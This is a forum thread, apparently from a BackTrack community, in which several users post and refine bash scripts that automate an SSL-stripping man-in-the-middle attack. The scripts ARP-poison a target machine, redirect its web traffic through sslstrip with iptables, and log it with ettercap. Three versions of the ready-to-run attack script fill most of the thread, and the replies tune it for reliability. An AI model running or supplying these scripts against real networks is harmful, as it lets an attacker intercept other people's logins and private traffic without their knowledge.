nicely done. thanks!
SSL sniffing script
I made a script for SSL sniffing as per g0tmilk's howto here: forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html#post141532 .
I'm not new to linux, but new to BackTrack. This is the first shell script that I ever made. Feedback would be GREATLY appreciated.
Note: To use properly, you first have to uncoment 2 lines in /etc/etter.conf (the redir_command_on and redir_command_off lines for iptables).
Hope this helps!Code:#!/bin/bash clear echo "Hello $USER!" echo "Welcome to the SSL sniffing script" clear echo "What's the interface you'll be using? [eth0]" read iface if [ "$iface" = "" ] then iface="eth0" fi clear echo "What's the target's IP?" read tip clear echo "What's the target's gateway? [192.168.1.1]" read tdg if [ "$tdg" = "" ] then tdg="192.168.1.1" fi clear echo "The selected interface is $iface" echo "The target IP is $tip" echo "The target gateway is $tdg" echo "I'm ready to run the script." echo "Are you sure you want to run it [y/n]?" read yn if [ "$yn" != "y" ] then echo "Exiting..." echo "Have a nice day :)" exit 0 fi clear echo "Running..." echo 1 > /proc/sys/net/ipv4/ip_forward konsole -e arpspoof -i $iface -t $tip $tdg & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 konsole -e sslstrip -a -k -f & clear echo "Running ettercap" ettercap -T -q -i $iface clear echo "All cleaned up." echo "Have a nice day :)"
nicely done. thanks!
"Why is it drug addicts and computer afficionados are both called users? "
remove at least the
because the system isn't cleaned up, you still have ip_forwarding enabledCode:echo "All cleaned up."
haven't tried the script
Auswaertsspiel
nice script
But you don't have to uncomment the 2 lines!!!!
then you would have ettercap forwarding the packets!!!
When you uncomment the forwarding of ettercap then ettercap disables the ip forwarding of the kernel (it is in the manual) ...
Ok? and don't forget to run ettercap in unoffensive mode ( -u arg)....
Very good script by the way!!!
Well done Jimmy Kane
Keep scripting and sharing
BTW Welcome to the forums
Nick
@davos1: Very nice script man, keep up the good work, and contributing.
You most likely chose "konsole" so it launches those in there own terminals so you can view output, but just sort of a note(you might already know about it) but the nohup command could be used in place of konsole for use if you were not running a graphical environment.
I would like to contribute the script I use for SSL sniffing, with contributing this I am not trying to start a "competition" or anything simply sharing open source code, in the mentality of open source.(lets all share and improve each others code)There are some issues I plan to address with this script, and many improvements I want to address. In the current state it executes correctly and is capable of grabbing the appropriate data. Please let me know of *any* issues you have with it, ideas, improvements, etc.All feedback is constructive feedback.
General usage: sslsniff.sh -v <ip of target> -g <network gateway>
-v, and -g, are required however -s is optional, if excluded sslsniff defaults to port 10000.
Also note still required to edit etter.conf manually(plan to change that in the future)
Code:#!/bin/bash # # Synopsis: A program to sniff traffic in an SSL connection # Author: thims (thims DOT local AT gmail DOT com) # Version: 0.2 # Date: 20091107 # Comments: # ToDO: # - Create section that edits iptables rules in /etc/etter.conf # leave blank simply here for coding style victim= gateway= sslPort=10000 # print help function help() { cat << EOF Usage: $0 [args] host -h, --help - Print this help and exit -v, --victim - IP address of desired host -g, --gateway - IP address of network gateway -s, --sslport - Desired port for sslstrip EOF } # echo supplied argument and die function die() { if [ -n "$1" ] ;then echo "$1" fi exit 1 } # nohup wrapper to check if specified program will execute correctly function noHup() { cmd="$1" nohup $cmd > /dev/null &> /dev/null & sleep 5 # here simply to handle sslstrip because it is ran by python it throws off pidof if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') else pid=$(pidof $(echo "$1" | awk -F" " '{print $1}')) fi if [ -z "$pid" ] ;then return 1 else return 0 fi } # poison the arp function spoofMac() { echo -n "Poisoning the victim...." noHup "arpspoof -t "$victim" "$gateway"" if [ $? -gt 0 ] ;then die "Error: could not initiate arpspoof. Dieing..." fi echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run echo "Ok" } # intercept the SSL cert function sslInit() { echo -n "Setting up SSL intercept...." echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort" noHup "sslstrip -a -f -k -l "$sslPort"" if [ $? -gt 0 ] ;then die "Error: could not initiate sslstrip. Dieing..." fi echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run echo "Ok" } # capture the responses function capture() { echo -n "Starting to sniff...." ettercap -T -q } # clean up enviroment function cleanUp() { echo "Cleaning up...." echo -n "Closing SSL proxy...." kill $(cat /var/run/sslsniff.sslstrip.run) rm /var/run/sslsniff.sslstrip.run echo "Ok" echo -n "Unpoisoning the victim...." kill -n 2 $(cat /var/run/sslsniff.arpspoof.run) rm /var/run/sslsniff.arpspoof.run echo "Ok" echo -n "Removing iptables rule and ip_forwarding...." iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort" echo 0 > /proc/sys/net/ipv4/ip_forward echo "Ok" echo "Have a nice day!" } # initialize the whole shebang function initialize() { if [ -z "$victim" ] || [ -z "$gateway" ] ;then help echo die "Error: a syntactical one" else spoofMac sslInit capture cleanUp fi } # some CLI ARGS? while [ $1 -gt 0 ] do case "$1" in "-h"|"--help") help die ;; "-v"|"--victim") victim="$2" ;; "-g"|"--gw") gateway="$2" ;; "-s"|"--sslport") sslPort="$1" ;; '') help echo die "Error: a syntactical one" ;; -*) help echo die "Error: a syntactical one" ;; esac shift done # main loop
thims,
Very nice script.
I already got some ideas from it. I love this one:
pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')100% agree. After all linux is sharing....lets all share and improve each others code....
Why don't you start a new post? It may be consider this as a hijacking.(?) Don't know.with contributing this I am not trying to start a "competition" or anything
One idea from me is to upload it to mediafire or whatever so we don't have to come here every-time and copy-paste etc.
Keep scripting and sharing.
(Please don't get bored soon.I personally keep my eyes on your scripts.)
Nick
A little more improvement!!!
A little more improvement
- taking the -i or --iface argument for choosing the interface cause arpspoof wont work if you don't run with the -i arg ....
- Printing the details of your configuration and i have put a small cat /proc/sys/net/ipv4/ip_forward due to reasons that sometimes echo 1 > /proc/sys/net/ipv4/ip_forward wont work ( i don't know why )
Greeting'sCode:#!/bin/bash # # Synopsis: A program to sniff traffic in an SSL connection # Author: thims (thims DOT local AT gmail DOT com) # Version: 0.2 # Date: 20091107 # Comments: # ToDO: # - Create section that edits iptables rules in /etc/etter.conf # leave blank simply here for coding style victim= gateway= sslPort=10000 # print help function help() { cat << EOF Usage: $0 [args] host -h, --help - Print this help and exit -i, --iface - Select the interface -v, --victim - IP address of desired host -g, --gateway - IP address of network gateway -s, --sslport - Desired port for sslstrip EOF } # echo supplied argument and die function die() { if [ -n "$1" ] ;then echo "$1" fi exit 1 } # nohup wrapper to check if specified program will execute correctly function noHup() { cmd="$1" nohup $cmd > /dev/null &> /dev/null & sleep 5 # here simply to handle sslstrip because it is ran by python it throws off pidof if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') else pid=$(pidof $(echo "$1" | awk -F" " '{print $1}')) fi if [ -z "$pid" ] ;then return 1 else return 0 fi } # poison the arp function spoofMac() { echo -n "Poisoning the victim...." noHup "arpspoof -i "$iface" -t "$victim" "$gateway"" if [ $? -gt 0 ] ;then die "Error: could not initiate arpspoof. Dieing..." fi echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run echo "Ok" } # intercept the SSL cert function sslInit() { echo -n "Setting up SSL intercept...." echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort" noHup "sslstrip -a -f -k -l "$sslPort"" if [ $? -gt 0 ] ;then die "Error: could not initiate sslstrip. Dieing..." fi echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run cat -n "Forwarding:" /proc/sys/net/ipv4/ip_forward echo "Ok" } # capture the responses function capture() { echo -n "Starting to sniff...." ettercap -T -q -i "$iface" } # clean up enviroment function cleanUp() { echo "Cleaning up...." echo -n "Closing SSL proxy...." kill $(cat /var/run/sslsniff.sslstrip.run) rm /var/run/sslsniff.sslstrip.run echo "Ok" echo -n "Unpoisoning the victim...." kill -n 2 $(cat /var/run/sslsniff.arpspoof.run) rm /var/run/sslsniff.arpspoof.run echo "Ok" echo -n "Removing iptables rule and ip_forwarding...." iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort" echo 0 > /proc/sys/net/ipv4/ip_forward echo "Ok" echo "Have a nice day!" } # initialize the whole shebang function initialize() { if [ -z "$victim" ] || [ -z "$gateway" ] || [ -z "$iface" ];then help echo die "Error: a syntactical one1" else echo "Victim: " "$victim" " Ok!" echo "Gateway/Router: " "$gateway" " OK!" echo "Interface: " "$iface" " OK!" echo "SSLStrip on: " "$sslPort" " OK!" spoofMac sslInit capture cleanUp fi } # some CLI ARGS? while [ $# -gt 0 ] do case "$1" in "-h"|"--help") help die ;; "-v"|"--victim") victim="$2" ;; "-g"|"--gw") gateway="$2" ;; "-s"|"--sslport") sslPort="$1" ;; "-i"|"--iface") iface="$2" ;; '') help echo die "Error: a syntactical one" ;; -*) help echo die "Error: a syntactical one" ;; esac shift done # main loop initialize
[I]"Everything that is communication comes from ... quartz crystals..." [/I]
@nick_the_greek: thank you, I would like to think bash one-liners is my specialty(maybe just my interest, /me shrugs). Yeah I thought about posting a new thread, but at the time I couldnt being a new account, and I debated whether it would be a duplicate thread or a hijacking. I will probably create a new thread because I have made some changes already and incorporated a few new nice features. Also I just created a mediafire account good call. I will keep sharing, have any suggestions? all suggestions are def. welcome.
@jimmy Kane: Thank you, nice suggestions btw, I saw your email was just procrastinating a bit. I added the iface option and am looking into the ip_forward issue, I havent quite got a replica of the issue yet, care to provide more details on it? I might just end up adding some error correction for when it sets up the ip_forward.
Note: when I create the new thread I will link to it from this post.
Posting Permissions